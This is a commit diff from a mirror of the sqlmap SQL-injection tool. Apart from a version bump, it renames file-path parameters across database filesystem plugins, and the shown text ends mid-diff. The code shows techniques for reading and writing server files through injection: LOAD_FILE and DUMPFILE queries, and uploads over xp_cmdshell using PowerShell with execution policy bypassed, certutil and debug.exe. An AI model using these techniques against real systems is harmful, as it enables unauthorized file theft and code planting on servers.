sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-11-01 16:37:27 +03:00
Code Issues Packages Projects Releases Wiki Activity

Some renaming (pylint stuff)

Browse Source
This commit is contained in:
Miroslav Stampar 2019-06-03 10:41:51 +02:00
parent e236ba5616
commit b3cdec547b
17 changed files with 108 additions and 108 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/core/settings.py
View File

@ -18,7 +18,7 @@ from lib.core.enums import OS
from thirdparty.six import unichr as _unichr from thirdparty.six import unichr as _unichr
# sqlmap version (<major>.<minor>.<month>.<monthly commit>) # sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.3.6.5" VERSION = "1.3.6.6"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

2
plugins/dbms/access/enumeration.py
View File

@ -23,7 +23,7 @@ class Enumeration(GenericEnumeration):
warnMsg = "on Microsoft Access it is not possible to get name of the current database" warnMsg = "on Microsoft Access it is not possible to get name of the current database"
logger.warn(warnMsg) logger.warn(warnMsg)
def isDba(self, *args, **kwargs): def isDba(self, user=None):
warnMsg = "on Microsoft Access it is not possible to test if current user is DBA" warnMsg = "on Microsoft Access it is not possible to test if current user is DBA"
logger.warn(warnMsg) logger.warn(warnMsg)

4
plugins/dbms/access/filesystem.py
View File

@ -9,10 +9,10 @@ from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
def readFile(self, rFile): def readFile(self, remoteFile):
errMsg = "on Microsoft Access it is not possible to read files" errMsg = "on Microsoft Access it is not possible to read files"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
errMsg = "on Microsoft Access it is not possible to write files" errMsg = "on Microsoft Access it is not possible to write files"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)

4
plugins/dbms/firebird/filesystem.py
View File

@ -9,10 +9,10 @@ from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
def readFile(self, rFile): def readFile(self, remoteFile):
errMsg = "on Firebird it is not possible to read files" errMsg = "on Firebird it is not possible to read files"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
errMsg = "on Firebird it is not possible to write files" errMsg = "on Firebird it is not possible to write files"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)

4
plugins/dbms/h2/filesystem.py
View File

@ -9,10 +9,10 @@ from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
def readFile(self, rFile): def readFile(self, remoteFile):
errMsg = "on H2 it is not possible to read files" errMsg = "on H2 it is not possible to read files"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
errMsg = "on H2 it is not possible to write files" errMsg = "on H2 it is not possible to write files"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)

4
plugins/dbms/hsqldb/filesystem.py
View File

@ -9,10 +9,10 @@ from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
def readFile(self, rFile): def readFile(self, remoteFile):
errMsg = "on HSQLDB it is not possible to read files" errMsg = "on HSQLDB it is not possible to read files"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
errMsg = "on HSQLDB it is not possible to write files" errMsg = "on HSQLDB it is not possible to write files"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)

4
plugins/dbms/maxdb/filesystem.py
View File

@ -9,10 +9,10 @@ from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
def readFile(self, rFile): def readFile(self, remoteFile):
errMsg = "on SAP MaxDB reading of files is not supported" errMsg = "on SAP MaxDB reading of files is not supported"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
errMsg = "on SAP MaxDB writing of files is not supported" errMsg = "on SAP MaxDB writing of files is not supported"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)

104
plugins/dbms/mssqlserver/filesystem.py
View File

@ -81,8 +81,8 @@ class Filesystem(GenericFilesystem):
return chunkName return chunkName
def stackedReadFile(self, rFile): def stackedReadFile(self, remoteFile):
infoMsg = "fetching file: '%s'" % rFile infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
result = [] result = []
@ -93,8 +93,8 @@ class Filesystem(GenericFilesystem):
inject.goStacked("DROP TABLE %s" % hexTbl) inject.goStacked("DROP TABLE %s" % hexTbl)
inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)")) inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))
logger.debug("loading the content of file '%s' into support table" % rFile) logger.debug("loading the content of file '%s' into support table" % remoteFile)
inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True) inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, remoteFile, randomStr(10), randomStr(10)), silent=True)
# Reference: https://web.archive.org/web/20120211184457/http://support.microsoft.com/kb/104829 # Reference: https://web.archive.org/web/20120211184457/http://support.microsoft.com/kb/104829
binToHexQuery = """DECLARE @charset VARCHAR(16) binToHexQuery = """DECLARE @charset VARCHAR(16)
@ -147,7 +147,7 @@ class Filesystem(GenericFilesystem):
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
errMsg = "unable to retrieve the content of the " errMsg = "unable to retrieve the content of the "
errMsg += "file '%s'" % rFile errMsg += "file '%s'" % remoteFile
raise SqlmapNoneDataException(errMsg) raise SqlmapNoneDataException(errMsg)
indexRange = getLimitRange(count) indexRange = getLimitRange(count)
@ -160,41 +160,41 @@ class Filesystem(GenericFilesystem):
return result return result
def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False): def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
errMsg = "Microsoft SQL Server does not support file upload with " errMsg = "Microsoft SQL Server does not support file upload with "
errMsg += "UNION query SQL injection technique" errMsg += "UNION query SQL injection technique"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
def _stackedWriteFilePS(self, tmpPath, wFileContent, dFile, fileType): def _stackedWriteFilePS(self, tmpPath, localFileContent, remoteFile, fileType):
infoMsg = "using PowerShell to write the %s file content " % fileType infoMsg = "using PowerShell to write the %s file content " % fileType
infoMsg += "to file '%s'" % dFile infoMsg += "to file '%s'" % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
encodedFileContent = encodeBase64(wFileContent, binary=False) encodedFileContent = encodeBase64(localFileContent, binary=False)
encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True) encodedBase64File = "tmpf%s.txt" % randomStr(lowercase=True)
encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File) encodedBase64FilePath = "%s\\%s" % (tmpPath, encodedBase64File)
randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True) randPSScript = "tmpps%s.ps1" % randomStr(lowercase=True)
randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript) randPSScriptPath = "%s\\%s" % (tmpPath, randPSScript)
wFileSize = len(encodedFileContent) localFileSize = len(encodedFileContent)
chunkMaxSize = 1024 chunkMaxSize = 1024
logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath) logger.debug("uploading the base64-encoded file to %s, please wait.." % encodedBase64FilePath)
for i in xrange(0, wFileSize, chunkMaxSize): for i in xrange(0, localFileSize, chunkMaxSize):
wEncodedChunk = encodedFileContent[i:i + chunkMaxSize] wEncodedChunk = encodedFileContent[i:i + chunkMaxSize]
self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File) self.xpCmdshellWriteFile(wEncodedChunk, tmpPath, encodedBase64File)
psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath psString = "$Base64 = Get-Content -Path \"%s\"; " % encodedBase64FilePath
psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = " psString += "$Base64 = $Base64 -replace \"`t|`n|`r\",\"\"; $Content = "
psString += "[System.Convert]::FromBase64String($Base64); Set-Content " psString += "[System.Convert]::FromBase64String($Base64); Set-Content "
psString += "-Path \"%s\" -Value $Content -Encoding Byte" % dFile psString += "-Path \"%s\" -Value $Content -Encoding Byte" % remoteFile
logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath) logger.debug("uploading the PowerShell base64-decoding script to %s" % randPSScriptPath)
self.xpCmdshellWriteFile(psString, tmpPath, randPSScript) self.xpCmdshellWriteFile(psString, tmpPath, randPSScript)
logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % dFile) logger.debug("executing the PowerShell base64-decoding script to write the %s file, please wait.." % remoteFile)
commands = ( commands = (
"powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath, "powershell -ExecutionPolicy ByPass -File \"%s\"" % randPSScriptPath,
@ -204,27 +204,27 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
def _stackedWriteFileDebugExe(self, tmpPath, wFile, wFileContent, dFile, fileType): def _stackedWriteFileDebugExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):
infoMsg = "using debug.exe to write the %s " % fileType infoMsg = "using debug.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % dFile infoMsg += "file content to file '%s', please wait.." % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
dFileName = ntpath.basename(dFile) remoteFileName = ntpath.basename(remoteFile)
sFile = "%s\\%s" % (tmpPath, dFileName) sFile = "%s\\%s" % (tmpPath, remoteFileName)
wFileSize = os.path.getsize(wFile) localFileSize = os.path.getsize(localFile)
debugSize = 0xFF00 debugSize = 0xFF00
if wFileSize < debugSize: if localFileSize < debugSize:
chunkName = self._updateDestChunk(wFileContent, tmpPath) chunkName = self._updateDestChunk(localFileContent, tmpPath)
debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType) debugMsg = "renaming chunk file %s\\%s to %s " % (tmpPath, chunkName, fileType)
debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, dFileName, dFile) debugMsg += "file %s\\%s and moving it to %s" % (tmpPath, remoteFileName, remoteFile)
logger.debug(debugMsg) logger.debug(debugMsg)
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
"ren %s %s" % (chunkName, dFileName), "ren %s %s" % (chunkName, remoteFileName),
"move /Y %s %s" % (dFileName, dFile) "move /Y %s %s" % (remoteFileName, remoteFile)
) )
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
@ -235,18 +235,18 @@ class Filesystem(GenericFilesystem):
debugMsg += "on the server, please wait.." debugMsg += "on the server, please wait.."
logger.debug(debugMsg) logger.debug(debugMsg)
for i in xrange(0, wFileSize, debugSize): for i in xrange(0, localFileSize, debugSize):
wFileChunk = wFileContent[i:i + debugSize] localFileChunk = localFileContent[i:i + debugSize]
chunkName = self._updateDestChunk(wFileChunk, tmpPath) chunkName = self._updateDestChunk(localFileChunk, tmpPath)
if i == 0: if i == 0:
debugMsg = "renaming chunk " debugMsg = "renaming chunk "
copyCmd = "ren %s %s" % (chunkName, dFileName) copyCmd = "ren %s %s" % (chunkName, remoteFileName)
else: else:
debugMsg = "appending chunk " debugMsg = "appending chunk "
copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName) copyCmd = "copy /B /Y %s+%s %s" % (remoteFileName, chunkName, remoteFileName)
debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, dFileName) debugMsg += "%s\\%s to %s file %s\\%s" % (tmpPath, chunkName, fileType, tmpPath, remoteFileName)
logger.debug(debugMsg) logger.debug(debugMsg)
commands = ( commands = (
@ -257,18 +257,18 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
logger.debug("moving %s file %s to %s" % (fileType, sFile, dFile)) logger.debug("moving %s file %s to %s" % (fileType, sFile, remoteFile))
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
"move /Y %s %s" % (dFileName, dFile) "move /Y %s %s" % (remoteFileName, remoteFile)
) )
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
def _stackedWriteFileVbs(self, tmpPath, wFileContent, dFile, fileType): def _stackedWriteFileVbs(self, tmpPath, localFileContent, remoteFile, fileType):
infoMsg = "using a custom visual basic script to write the " infoMsg = "using a custom visual basic script to write the "
infoMsg += "%s file content to file '%s', please wait.." % (fileType, dFile) infoMsg += "%s file content to file '%s', please wait.." % (fileType, remoteFile)
logger.info(infoMsg) logger.info(infoMsg)
randVbs = "tmps%s.vbs" % randomStr(lowercase=True) randVbs = "tmps%s.vbs" % randomStr(lowercase=True)
@ -327,10 +327,10 @@ class Filesystem(GenericFilesystem):
Else Else
mimedecode = InStr(Base64Chars, strIn) - 1 mimedecode = InStr(Base64Chars, strIn) - 1
End If End If
End Function""" % (randFilePath, dFile) End Function""" % (randFilePath, remoteFile)
vbs = vbs.replace(" ", "") vbs = vbs.replace(" ", "")
encodedFileContent = encodeBase64(wFileContent, binary=False) encodedFileContent = encodeBase64(localFileContent, binary=False)
logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath) logger.debug("uploading the file base64-encoded content to %s, please wait.." % randFilePath)
@ -349,9 +349,9 @@ class Filesystem(GenericFilesystem):
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
def _stackedWriteFileCertutilExe(self, tmpPath, wFile, wFileContent, dFile, fileType): def _stackedWriteFileCertutilExe(self, tmpPath, localFile, localFileContent, remoteFile, fileType):
infoMsg = "using certutil.exe to write the %s " % fileType infoMsg = "using certutil.exe to write the %s " % fileType
infoMsg += "file content to file '%s', please wait.." % dFile infoMsg += "file content to file '%s', please wait.." % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
chunkMaxSize = 500 chunkMaxSize = 500
@ -359,7 +359,7 @@ class Filesystem(GenericFilesystem):
randFile = "tmpf%s.txt" % randomStr(lowercase=True) randFile = "tmpf%s.txt" % randomStr(lowercase=True)
randFilePath = "%s\\%s" % (tmpPath, randFile) randFilePath = "%s\\%s" % (tmpPath, randFile)
encodedFileContent = encodeBase64(wFileContent, binary=False) encodedFileContent = encodeBase64(localFileContent, binary=False)
splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)]) splittedEncodedFileContent = '\n'.join([encodedFileContent[i:i + chunkMaxSize] for i in xrange(0, len(encodedFileContent), chunkMaxSize)])
@ -367,17 +367,17 @@ class Filesystem(GenericFilesystem):
self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile) self.xpCmdshellWriteFile(splittedEncodedFileContent, tmpPath, randFile)
logger.debug("decoding the file to %s.." % dFile) logger.debug("decoding the file to %s.." % remoteFile)
commands = ( commands = (
"cd \"%s\"" % tmpPath, "cd \"%s\"" % tmpPath,
"certutil -f -decode %s %s" % (randFile, dFile), "certutil -f -decode %s %s" % (randFile, remoteFile),
"del /F /Q %s" % randFile "del /F /Q %s" % randFile
) )
self.execCmd(" & ".join(command for command in commands)) self.execCmd(" & ".join(command for command in commands))
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
# NOTE: this is needed here because we use xp_cmdshell extended # NOTE: this is needed here because we use xp_cmdshell extended
# procedure to write a file on the back-end Microsoft SQL Server # procedure to write a file on the back-end Microsoft SQL Server
# file system # file system
@ -386,35 +386,35 @@ class Filesystem(GenericFilesystem):
self.getRemoteTempPath() self.getRemoteTempPath()
tmpPath = posixToNtSlashes(conf.tmpPath) tmpPath = posixToNtSlashes(conf.tmpPath)
dFile = posixToNtSlashes(dFile) remoteFile = posixToNtSlashes(remoteFile)
with open(wFile, "rb") as f: with open(localFile, "rb") as f:
wFileContent = f.read() localFileContent = f.read()
self._stackedWriteFilePS(tmpPath, wFileContent, dFile, fileType) self._stackedWriteFilePS(tmpPath, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
if written is False: if written is False:
message = "do you want to try to upload the file with " message = "do you want to try to upload the file with "
message += "the custom Visual Basic script technique? [Y/n] " message += "the custom Visual Basic script technique? [Y/n] "
if readInput(message, default='Y', boolean=True): if readInput(message, default='Y', boolean=True):
self._stackedWriteFileVbs(tmpPath, wFileContent, dFile, fileType) self._stackedWriteFileVbs(tmpPath, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
if written is False: if written is False:
message = "do you want to try to upload the file with " message = "do you want to try to upload the file with "
message += "the built-in debug.exe technique? [Y/n] " message += "the built-in debug.exe technique? [Y/n] "
if readInput(message, default='Y', boolean=True): if readInput(message, default='Y', boolean=True):
self._stackedWriteFileDebugExe(tmpPath, wFile, wFileContent, dFile, fileType) self._stackedWriteFileDebugExe(tmpPath, localFile, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
if written is False: if written is False:
message = "do you want to try to upload the file with " message = "do you want to try to upload the file with "
message += "the built-in certutil.exe technique? [Y/n] " message += "the built-in certutil.exe technique? [Y/n] "
if readInput(message, default='Y', boolean=True): if readInput(message, default='Y', boolean=True):
self._stackedWriteFileCertutilExe(tmpPath, wFile, wFileContent, dFile, fileType) self._stackedWriteFileCertutilExe(tmpPath, localFile, localFileContent, remoteFile, fileType)
written = self.askCheckWrittenFile(wFile, dFile, forceCheck) written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
return written return written

44
plugins/dbms/mysql/filesystem.py
View File

@ -38,8 +38,8 @@ class Filesystem(GenericFilesystem):
return result return result
def stackedReadFile(self, rFile): def stackedReadFile(self, remoteFile):
infoMsg = "fetching file: '%s'" % rFile infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
self.createSupportTbl(self.fileTblName, self.tblField, "longtext") self.createSupportTbl(self.fileTblName, self.tblField, "longtext")
@ -47,13 +47,13 @@ class Filesystem(GenericFilesystem):
tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True)) tmpFile = "%s/tmpf%s" % (conf.tmpPath, randomStr(lowercase=True))
debugMsg = "saving hexadecimal encoded content of file '%s' " % rFile debugMsg = "saving hexadecimal encoded content of file '%s' " % remoteFile
debugMsg += "into temporary file '%s'" % tmpFile debugMsg += "into temporary file '%s'" % tmpFile
logger.debug(debugMsg) logger.debug(debugMsg)
inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (rFile, tmpFile)) inject.goStacked("SELECT HEX(LOAD_FILE('%s')) INTO DUMPFILE '%s'" % (remoteFile, tmpFile))
debugMsg = "loading the content of hexadecimal encoded file " debugMsg = "loading the content of hexadecimal encoded file "
debugMsg += "'%s' into support table" % rFile debugMsg += "'%s' into support table" % remoteFile
logger.debug(debugMsg) logger.debug(debugMsg)
inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField)) inject.goStacked("LOAD DATA INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY '%s' (%s)" % (tmpFile, self.fileTblName, randomStr(10), self.tblField))
@ -61,12 +61,12 @@ class Filesystem(GenericFilesystem):
if not isNumPosStrValue(length): if not isNumPosStrValue(length):
warnMsg = "unable to retrieve the content of the " warnMsg = "unable to retrieve the content of the "
warnMsg += "file '%s'" % rFile warnMsg += "file '%s'" % remoteFile
if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
warnMsg += ", going to fall-back to simpler UNION technique" warnMsg += ", going to fall-back to simpler UNION technique"
logger.warn(warnMsg) logger.warn(warnMsg)
result = self.nonStackedReadFile(rFile) result = self.nonStackedReadFile(remoteFile)
else: else:
raise SqlmapNoneDataException(warnMsg) raise SqlmapNoneDataException(warnMsg)
else: else:
@ -85,10 +85,10 @@ class Filesystem(GenericFilesystem):
return result return result
@stackedmethod @stackedmethod
def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False): def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
logger.debug("encoding file to its hexadecimal string value") logger.debug("encoding file to its hexadecimal string value")
fcEncodedList = self.fileEncode(wFile, "hex", True) fcEncodedList = self.fileEncode(localFile, "hex", True)
fcEncodedStr = fcEncodedList[0] fcEncodedStr = fcEncodedList[0]
fcEncodedStrLen = len(fcEncodedStr) fcEncodedStrLen = len(fcEncodedStr)
@ -99,12 +99,12 @@ class Filesystem(GenericFilesystem):
warnMsg += "writing process" warnMsg += "writing process"
logger.warn(warnMsg) logger.warn(warnMsg)
debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
logger.debug(debugMsg) logger.debug(debugMsg)
pushValue(kb.forceWhere) pushValue(kb.forceWhere)
kb.forceWhere = PAYLOAD.WHERE.NEGATIVE kb.forceWhere = PAYLOAD.WHERE.NEGATIVE
sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, dFile) sqlQuery = "%s INTO DUMPFILE '%s'" % (fcEncodedStr, remoteFile)
unionUse(sqlQuery, unpack=False) unionUse(sqlQuery, unpack=False)
kb.forceWhere = popValue() kb.forceWhere = popValue()
@ -112,12 +112,12 @@ class Filesystem(GenericFilesystem):
warnMsg += "file as a leftover from UNION query" warnMsg += "file as a leftover from UNION query"
singleTimeWarnMessage(warnMsg) singleTimeWarnMessage(warnMsg)
return self.askCheckWrittenFile(wFile, dFile, forceCheck) return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
def linesTerminatedWriteFile(self, wFile, dFile, fileType, forceCheck=False): def linesTerminatedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
logger.debug("encoding file to its hexadecimal string value") logger.debug("encoding file to its hexadecimal string value")
fcEncodedList = self.fileEncode(wFile, "hex", True) fcEncodedList = self.fileEncode(localFile, "hex", True)
fcEncodedStr = fcEncodedList[0][2:] fcEncodedStr = fcEncodedList[0][2:]
fcEncodedStrLen = len(fcEncodedStr) fcEncodedStrLen = len(fcEncodedStr)
@ -128,10 +128,10 @@ class Filesystem(GenericFilesystem):
warnMsg += "writing process" warnMsg += "writing process"
logger.warn(warnMsg) logger.warn(warnMsg)
debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
logger.debug(debugMsg) logger.debug(debugMsg)
query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=dFile, HEXSTRING=fcEncodedStr) query = getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=remoteFile, HEXSTRING=fcEncodedStr)
query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required) query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required)
payload = agent.payload(newValue=query) payload = agent.payload(newValue=query)
Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False) Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False)
@ -140,9 +140,9 @@ class Filesystem(GenericFilesystem):
warnMsg += "file as a leftover from original query" warnMsg += "file as a leftover from original query"
singleTimeWarnMessage(warnMsg) singleTimeWarnMessage(warnMsg)
return self.askCheckWrittenFile(wFile, dFile, forceCheck) return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)
def stackedWriteFile(self, wFile, dFile, fileType, forceCheck=False): def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
debugMsg = "creating a support table to write the hexadecimal " debugMsg = "creating a support table to write the hexadecimal "
debugMsg += "encoded file to" debugMsg += "encoded file to"
logger.debug(debugMsg) logger.debug(debugMsg)
@ -150,7 +150,7 @@ class Filesystem(GenericFilesystem):
self.createSupportTbl(self.fileTblName, self.tblField, "longblob") self.createSupportTbl(self.fileTblName, self.tblField, "longblob")
logger.debug("encoding file to its hexadecimal string value") logger.debug("encoding file to its hexadecimal string value")
fcEncodedList = self.fileEncode(wFile, "hex", False) fcEncodedList = self.fileEncode(localFile, "hex", False)
debugMsg = "forging SQL statements to write the hexadecimal " debugMsg = "forging SQL statements to write the hexadecimal "
debugMsg += "encoded file to the support table" debugMsg += "encoded file to the support table"
@ -165,10 +165,10 @@ class Filesystem(GenericFilesystem):
for sqlQuery in sqlQueries: for sqlQuery in sqlQueries:
inject.goStacked(sqlQuery) inject.goStacked(sqlQuery)
debugMsg = "exporting the %s file content to file '%s'" % (fileType, dFile) debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
logger.debug(debugMsg) logger.debug(debugMsg)
# Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html # Reference: http://dev.mysql.com/doc/refman/5.1/en/select.html
inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, dFile), silent=True) inject.goStacked("SELECT %s FROM %s INTO DUMPFILE '%s'" % (self.tblField, self.fileTblName, remoteFile), silent=True)
return self.askCheckWrittenFile(wFile, dFile, forceCheck) return self.askCheckWrittenFile(localFile, remoteFile, forceCheck)

4
plugins/dbms/oracle/filesystem.py
View File

@ -9,12 +9,12 @@ from lib.core.exception import SqlmapUnsupportedFeatureException
from plugins.generic.filesystem import Filesystem as GenericFilesystem from plugins.generic.filesystem import Filesystem as GenericFilesystem
class Filesystem(GenericFilesystem): class Filesystem(GenericFilesystem):
def readFile(self, rFile): def readFile(self, remoteFile):
errMsg = "File system read access not yet implemented for " errMsg = "File system read access not yet implemented for "
errMsg += "Oracle" errMsg += "Oracle"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)
def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
errMsg = "File system write access not yet implemented for " errMsg = "File system write access not yet implemented for "
errMsg += "Oracle" errMsg += "Oracle"
raise SqlmapUnsupportedFeatureException(errMsg) raise SqlmapUnsupportedFeatureException(errMsg)

22
plugins/dbms/postgresql/filesystem.py
View File

@ -22,22 +22,22 @@ class Filesystem(GenericFilesystem):
GenericFilesystem.__init__(self) GenericFilesystem.__init__(self)
def stackedReadFile(self, rFile): def stackedReadFile(self, remoteFile):
infoMsg = "fetching file: '%s'" % rFile infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg) logger.info(infoMsg)
self.initEnv() self.initEnv()
return self.udfEvalCmd(cmd=rFile, udfName="sys_fileread") return self.udfEvalCmd(cmd=remoteFile, udfName="sys_fileread")
def unionWriteFile(self, wFile, dFile, fileType, forceCheck=False): def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
